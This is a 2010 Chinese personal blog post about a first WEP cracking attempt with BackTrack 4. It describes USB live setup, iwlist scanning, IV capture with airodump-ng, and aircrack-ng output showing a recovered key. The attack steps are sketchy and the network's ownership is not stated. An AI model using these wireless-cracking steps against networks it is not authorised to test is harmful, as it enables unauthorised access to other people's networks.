Monday, August 16, 2010

第一次完整流程体验wep破解

一个白天都在折腾bt4,直到下午才把usb persistent live 做好。
大致步骤:
live cd/dvd 启动 bt4;
1个4GB U盘,fdisk 分区成 2+2,fat32+ext3,激活1;
mount -o loop bt4 dvd iso, 复制内容到fat分区;
grub-install --no-floppy --root-directory=/PATH/TO/FIRST/PARTITION /dev/DEVICENAME;
done;
印象中就这几步,具体可以看看bt4官网的tutorials

破解过程其实都还简单,手头没教程,就只能自己折腾。
一开始遇到问题,所以后来先把 realtek的驱动装了,不过后来想想 iw scan时 nl80211 not found 的问题,应该不用装驱动;
iwlist wlan0 scanning,找到bssid,因为目标是在windows下就确定了的,所以根据essid,找到bssid,也就是mac,记下来就行;
airodump-ng 。。。。。 参数不记得了= =, --ivs --write test ..... 反正有一个 filter 用是 bssid,需要指定interface(最后一个参数),第一次抓了11466个包,不成,后来重搞,抓了20000+个,搞定了;
aircrack-ng 。。。。。 参数也不记得了,有个 -a 1 指定wep,有个指定ivs文件,最后结果大致入下:

                                                 Aircrack-ng 1.1 r1738


                                  [00:00:07] Tested 108182 keys (got 20290 IVs)

   KB    depth   byte(vote)
    0    1/ 33   13(25648) 4F(25392) 43(25280) 25(24912) D0(24836) 47(24800) AE(24696) 76(24544)
    1    0/ 11   57(27220) C4(26432) F8(26416) E3(25616) FB(24620) F6(24588) 04(24472) AC(24292)
    2    0/  1   92(29236) B8(25916) 84(25172) 8D(25092) 4E(24980) E6(24684) B1(24476) 41(23960)
    3    6/ 33   46(24548) 7C(24512) A6(24364) 72(24216) EA(24152) 14(23968) 27(23884) 64(23448)
    4    8/ 10   08(24404) C2(24332) 1E(24284) 11(24256) A7(24176) 30(24108) FC(24072) 02(23888)

                         KEY FOUND! [ 13:57:92:46:80 ]
        Decrypted correctly: 100%

No comments:

Post a Comment